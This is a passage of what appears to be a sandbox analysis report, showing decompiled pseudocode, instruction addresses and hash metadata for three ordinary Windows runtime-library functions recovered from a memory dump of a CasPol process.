				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					L0140EEF0(0x14e7b60);
					_t134 =  *0x14e7b84; // 0x77e47b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x14e7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x14e7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = L01406D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														L014076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01498938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E013FB150();
													}
													_t116 = L01496D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = L014075CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x14e8638; // 0x0
																	_t122 = L014038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			L014076E2(_t154);
																			goto L41;
																		}
																	} else {
																		L014076E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0142FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L014070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = L0142FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = L0142FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = L0142FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = L0142FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = L0142FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x14e7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x14e7b84 = _t75;
						_t73 = E0140EB70(_t134, 0x14e7b60);
						if( *0x14e7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = L0140FF60( *0x14e7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                  0x0142fab0
                                                                  0x0142fab2
                                                                  0x0142fab3
                                                                  0x0142fab4
                                                                  0x0142fabc
                                                                  0x0142fac0
                                                                  0x0142fb14
                                                                  0x0142fb17
                                                                  0x0142fac2
                                                                  0x0142fac8
                                                                  0x0142facd
                                                                  0x0142fad3
                                                                  0x0142fad3
                                                                  0x0142fadd
                                                                  0x0142fb18
                                                                  0x0142fb1b
                                                                  0x0142fb1d
                                                                  0x0142fb1e
                                                                  0x0142fb1f
                                                                  0x0142fb20
                                                                  0x0142fb21
                                                                  0x0142fb22
                                                                  0x0142fb23
                                                                  0x0142fb24
                                                                  0x0142fb25
                                                                  0x0142fb26
                                                                  0x0142fb27
                                                                  0x0142fb28
                                                                  0x0142fb29
                                                                  0x0142fb2a
                                                                  0x0142fb2b
                                                                  0x0142fb2c
                                                                  0x0142fb2d
                                                                  0x0142fb2e
                                                                  0x0142fb2f
                                                                  0x0142fb3a
                                                                  0x0142fb3b
                                                                  0x0142fb3e
                                                                  0x0142fb41
                                                                  0x0142fb44
                                                                  0x0142fb47
                                                                  0x0142fb4a
                                                                  0x0142fb4d
                                                                  0x0142fb53
                                                                  0x0146bdcb
                                                                  0x0146bdcb
                                                                  0x0142fb59
                                                                  0x0142fb5b
                                                                  0x0142fb5b
                                                                  0x0142fb5e
                                                                  0x0146bdd5
                                                                  0x0146bdd8
                                                                  0x00000000
                                                                  0x0146bdda
                                                                  0x00000000
                                                                  0x0146bdda
                                                                  0x0142fb64
                                                                  0x0142fb64
                                                                  0x0142fb64
                                                                  0x0142fb67
                                                                  0x0142fb6e
                                                                  0x0142fb70
                                                                  0x0142fb72
                                                                  0x00000000
                                                                  0x0142fb78
                                                                  0x0142fb7a
                                                                  0x0142fb7a
                                                                  0x0142fb7d
                                                                  0x0142fb80
                                                                  0x0146bddf
                                                                  0x0146bde1
                                                                  0x00000000
                                                                  0x0146bde3
                                                                  0x00000000
                                                                  0x0146bde3
                                                                  0x0142fb86
                                                                  0x0142fb86
                                                                  0x0142fb86
                                                                  0x0142fb8b
                                                                  0x0142fb90
                                                                  0x0142fb92
                                                                  0x0142fb94
                                                                  0x0142fb9a
                                                                  0x0142fb9b
                                                                  0x0142fba1
                                                                  0x0146bde8
                                                                  0x0146bdeb
                                                                  0x0146bded
                                                                  0x0146beb5
                                                                  0x0146beb5
                                                                  0x0146bebb
                                                                  0x0146bebd
                                                                  0x0146bec3
                                                                  0x0146bed2
                                                                  0x0146bedd
                                                                  0x0146bedd
                                                                  0x0146beed
                                                                  0x00000000
                                                                  0x0146bdf3
                                                                  0x0146bdfe
                                                                  0x0146be06
                                                                  0x0146be0b
                                                                  0x0146be0d
                                                                  0x0146be0f
                                                                  0x0146be14
                                                                  0x0146be19
                                                                  0x0146be20
                                                                  0x0146be25
                                                                  0x0146be27
                                                                  0x0146be35
                                                                  0x0146be39
                                                                  0x0146be46
                                                                  0x0146be4f
                                                                  0x0146be54
                                                                  0x0146be56
                                                                  0x0146bef8
                                                                  0x0146bef8
                                                                  0x00000000
                                                                  0x0146be5c
                                                                  0x0146be5c
                                                                  0x0146be60
                                                                  0x00000000
                                                                  0x0146be66
                                                                  0x0146be66
                                                                  0x0146be7f
                                                                  0x0146be84
                                                                  0x0146be87
                                                                  0x0146be89
                                                                  0x0146be8b
                                                                  0x0146be99
                                                                  0x0146be9d
                                                                  0x0146bea0
                                                                  0x0146beac
                                                                  0x0146beaf
                                                                  0x0146beb1
                                                                  0x0146beb3
                                                                  0x0146beb3
                                                                  0x00000000
                                                                  0x0146bea2
                                                                  0x0146bea2
                                                                  0x00000000
                                                                  0x0146bea2
                                                                  0x0146be8d
                                                                  0x0146be8d
                                                                  0x0146be92
                                                                  0x00000000
                                                                  0x0146be92
                                                                  0x0146be8b
                                                                  0x0146be60
                                                                  0x0146be3b
                                                                  0x0146be3b
                                                                  0x0146be3e
                                                                  0x00000000
                                                                  0x0146be40
                                                                  0x0146be40
                                                                  0x0146be44
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0146be44
                                                                  0x0146be3e
                                                                  0x0146be29
                                                                  0x0146be29
                                                                  0x00000000
                                                                  0x0146be29
                                                                  0x0146be27
                                                                  0x00000000
                                                                  0x0142fba7
                                                                  0x0142fba7
                                                                  0x0142fbab
                                                                  0x0146bf02
                                                                  0x0142fbb1
                                                                  0x0142fbb1
                                                                  0x0142fbb8
                                                                  0x0142fbbd
                                                                  0x0142fbbd
                                                                  0x0142fbbf
                                                                  0x0142fbbf
                                                                  0x0142fbc5
                                                                  0x0142fbcb
                                                                  0x0142fbf8
                                                                  0x0142fbf8
                                                                  0x0142fbfa
                                                                  0x00000000
                                                                  0x0142fc00
                                                                  0x0142fc00
                                                                  0x0142fc03
                                                                  0x00000000
                                                                  0x0142fc09
                                                                  0x0142fc09
                                                                  0x0142fc0f
                                                                  0x0142fc15
                                                                  0x0142fc23
                                                                  0x0142fc23
                                                                  0x0142fc25
                                                                  0x0142fc27
                                                                  0x0142fc75
                                                                  0x0142fc7c
                                                                  0x0142fc84
                                                                  0x00000000
                                                                  0x0142fc29
                                                                  0x0142fc29
                                                                  0x0142fc2d
                                                                  0x0142fc30
                                                                  0x0146bf0f
                                                                  0x00000000
                                                                  0x0142fc36
                                                                  0x0142fc38
                                                                  0x0142fc3b
                                                                  0x0142fc41
                                                                  0x0146bf17
                                                                  0x0146bf19
                                                                  0x0146bf48
                                                                  0x0146bf4b
                                                                  0x00000000
                                                                  0x0146bf1b
                                                                  0x0146bf22
                                                                  0x0146bf24
                                                                  0x0146bf26
                                                                  0x00000000
                                                                  0x0146bf2c
                                                                  0x0146bf37
                                                                  0x0146bf39
                                                                  0x0146bf3b
                                                                  0x00000000
                                                                  0x0146bf41
                                                                  0x0146bf41
                                                                  0x0146bf41
                                                                  0x0146bf41
                                                                  0x0146bf45
                                                                  0x00000000
                                                                  0x0146bf45
                                                                  0x0146bf3b
                                                                  0x0146bf26
                                                                  0x00000000
                                                                  0x0142fc47
                                                                  0x0142fc47
                                                                  0x0142fc49
                                                                  0x0142fcb2
                                                                  0x0142fcb4
                                                                  0x0142fcb6
                                                                  0x0142fcdc
                                                                  0x0142fcdc
                                                                  0x00000000
                                                                  0x0142fcb8
                                                                  0x0142fcc3
                                                                  0x0142fcc5
                                                                  0x0142fcc7
                                                                  0x00000000
                                                                  0x0142fcc9
                                                                  0x0142fcc9
                                                                  0x0142fccd
                                                                  0x00000000
                                                                  0x0142fccd
                                                                  0x0142fcc7
                                                                  0x00000000
                                                                  0x0142fc4b
                                                                  0x0142fc4b
                                                                  0x0142fc4e
                                                                  0x0142fc4e
                                                                  0x0142fc51
                                                                  0x0142fc51
                                                                  0x0142fc54
                                                                  0x0142fc5a
                                                                  0x0142fc5c
                                                                  0x0142fc5f
                                                                  0x0142fc61
                                                                  0x0142fc63
                                                                  0x0142fc65
                                                                  0x0142fc67
                                                                  0x0142fc6e
                                                                  0x0142fc72
                                                                  0x0142fc72
                                                                  0x0142fc72
                                                                  0x0142fc72
                                                                  0x0142fc67
                                                                  0x0142fc61
                                                                  0x00000000
                                                                  0x0142fc5a
                                                                  0x0142fc49
                                                                  0x0142fc41
                                                                  0x0142fc30
                                                                  0x0142fc27
                                                                  0x0142fc03
                                                                  0x0142fbcd
                                                                  0x0142fbd3
                                                                  0x0142fbd9
                                                                  0x0142fbdc
                                                                  0x0142fbde
                                                                  0x0142fc99
                                                                  0x0142fc9b
                                                                  0x0142fc9d
                                                                  0x0142fcd5
                                                                  0x0142fcd5
                                                                  0x0142fc89
                                                                  0x0142fc89
                                                                  0x00000000
                                                                  0x0142fc9f
                                                                  0x0142fc9f
                                                                  0x0142fca3
                                                                  0x00000000
                                                                  0x0142fca3
                                                                  0x00000000
                                                                  0x0142fbe4
                                                                  0x0142fbe4
                                                                  0x0142fbe4
                                                                  0x0142fbe4
                                                                  0x0142fbe9
                                                                  0x0142fbf2
                                                                  0x00000000
                                                                  0x0142fbf2
                                                                  0x0142fbde
                                                                  0x0142fbcb
                                                                  0x0142fbab
                                                                  0x0142fc8b
                                                                  0x0142fc8b
                                                                  0x0142fc8c
                                                                  0x0142fb80
                                                                  0x0142fb72
                                                                  0x0142fb5e
                                                                  0x0142fc8d
                                                                  0x0142fc91
                                                                  0x0142fadf
                                                                  0x0142fadf
                                                                  0x0142fae1
                                                                  0x0142fae4
                                                                  0x0142fae7
                                                                  0x0142faec
                                                                  0x0142faf8
                                                                  0x0142fb00
                                                                  0x0142fb07
                                                                  0x0142fb0f
                                                                  0x0142fb0f
                                                                  0x0142fb07
                                                                  0x00000000
                                                                  0x0142faf8
                                                                  0x0142fadd

                                                                  Strings
                                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0146BE0F
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                  • API String ID: 0-865735534
                                                                  • Opcode ID: bf2de46a6aecb13c719af4c9f7883d2e21b2b1b47626b2d370133bae593cf384
                                                                  • Instruction ID: 173cc638212b865c8e3532b36dd47540e4c8d7ac6135d4cc615cadd8cadcb3d5
                                                                  • Opcode Fuzzy Hash: bf2de46a6aecb13c719af4c9f7883d2e21b2b1b47626b2d370133bae593cf384
                                                                  • Instruction Fuzzy Hash: AFA10671B006168BEB26CB6AC45076AB7B8FF54624F84456FD906CB7B1DB30D886CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0142F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 75%
                                                                  			E0142F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01414120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01439830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01439990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E014395D0();
							goto L11;
						} else {
							_t109 = L01414620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0143F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E014395D0();
										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                  0x0142f0d3
                                                                  0x0142f0d9
                                                                  0x0142f0e0
                                                                  0x0142f0e7
                                                                  0x0142f0f2
                                                                  0x0142f0f4
                                                                  0x0142f0f8
                                                                  0x0142f100
                                                                  0x0142f108
                                                                  0x0142f10d
                                                                  0x0142f115
                                                                  0x0142f116
                                                                  0x0142f11f
                                                                  0x0142f123
                                                                  0x0142f124
                                                                  0x0142f12c
                                                                  0x0142f130
                                                                  0x0142f134
                                                                  0x0142f13d
                                                                  0x0142f144
                                                                  0x0142f14b
                                                                  0x0142f152
                                                                  0x0146bab0
                                                                  0x0146bab0
                                                                  0x0142f158
                                                                  0x0142f158
                                                                  0x0142f15a
                                                                  0x0142f160
                                                                  0x0142f165
                                                                  0x0142f166
                                                                  0x0142f16f
                                                                  0x0142f173
                                                                  0x0146baa7
                                                                  0x0146baa7
                                                                  0x0146baab
                                                                  0x00000000
                                                                  0x0142f179
                                                                  0x0142f18d
                                                                  0x0142f191
                                                                  0x0146baa2
                                                                  0x00000000
                                                                  0x0142f197
                                                                  0x0142f19b
                                                                  0x0142f1a2
                                                                  0x0142f1a9
                                                                  0x0142f1af
                                                                  0x0142f1b2
                                                                  0x0142f1b6
                                                                  0x0142f1b9
                                                                  0x0142f1c4
                                                                  0x0142f1d8
                                                                  0x0142f1df
                                                                  0x0142f1e3
                                                                  0x0142f1eb
                                                                  0x0142f1ee
                                                                  0x0142f1f4
                                                                  0x0142f20f
                                                                  0x0146bab7
                                                                  0x0146babb
                                                                  0x0146bacc
                                                                  0x0146bad1
                                                                  0x0142f215
                                                                  0x0142f218
                                                                  0x0142f226
                                                                  0x0142f22b
                                                                  0x00000000
                                                                  0x0142f22b
                                                                  0x0142f1f6
                                                                  0x0142f1f6
                                                                  0x0142f1f9
                                                                  0x0142f1fb
                                                                  0x0142f1fb
                                                                  0x0142f1f4
                                                                  0x0142f191
                                                                  0x0142f173
                                                                  0x0142f152
                                                                  0x0142f203

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                  • Instruction ID: 2492db53f1e265e8cdd61be078a7364b9900a30423487880d9276fe2843e85f7
                                                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                  • Instruction Fuzzy Hash: 94518E716047119FC321DF19C840A6BBBF8FF98714F108A2EF995876A0E7B4E944CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01473540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 75%
                                                                  			E01473540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x14ed360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01430BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					L01473706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0143FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01473540;
						E0143FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						L0144DDD0( &_v1072, _t75, _t79, _t80, _t81);
						L01480C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						L014397C0();
					}
					return L0143B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01473971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01473884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0143FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = L01439650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							L01473787(_a4,  &_v352, _t80);
						}
					}
					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E014395D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                  0x01473552
                                                                  0x0147355a
                                                                  0x0147355d
                                                                  0x01473566
                                                                  0x01473567
                                                                  0x0147357e
                                                                  0x0147358f
                                                                  0x014735a1
                                                                  0x014735a5
                                                                  0x0147366b
                                                                  0x0147366b
                                                                  0x0147366d
                                                                  0x01473672
                                                                  0x01473679
                                                                  0x01473685
                                                                  0x0147368d
                                                                  0x0147369d
                                                                  0x014736a7
                                                                  0x014736b8
                                                                  0x014736c6
                                                                  0x014736c7
                                                                  0x014736dc
                                                                  0x014736e1
                                                                  0x014736e7
                                                                  0x014736e9
                                                                  0x014736e9
                                                                  0x01473703
                                                                  0x01473703
                                                                  0x014735b5
                                                                  0x014735c0
                                                                  0x014735c4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014735ca
                                                                  0x014735d7
                                                                  0x014735e2
                                                                  0x014735e6
                                                                  0x014735e8
                                                                  0x014735f5
                                                                  0x014735fa
                                                                  0x01473603
                                                                  0x01473604
                                                                  0x01473609
                                                                  0x0147360a
                                                                  0x01473612
                                                                  0x01473613
                                                                  0x0147361e
                                                                  0x01473622
                                                                  0x01473628
                                                                  0x0147362f
                                                                  0x0147362f
                                                                  0x01473636
                                                                  0x01473638
                                                                  0x0147363b
                                                                  0x01473642
                                                                  0x01473642
                                                                  0x01473636
                                                                  0x01473657
                                                                  0x01473657
                                                                  0x0147365c
                                                                  0x01473662
                                                                  0x01473669
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryHash
                                                                  • API String ID: 0-2202222882
                                                                  • Opcode ID: c2c4d22ad03b96e70c61b1467d5022ef7ddcdc4ad0eb248ebea10c203211514a
                                                                  • Instruction ID: 221de14f844f2c2797b0e6f63e1b44dbcbd8eed302551deb6f7202acba894419
                                                                  • Opcode Fuzzy Hash: c2c4d22ad03b96e70c61b1467d5022ef7ddcdc4ad0eb248ebea10c203211514a
                                                                  • Instruction Fuzzy Hash: 9F4157F2D0052D9BDB21DE51CC80FDEB77CAB54714F0045AAEA09AB260DB309E89DF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

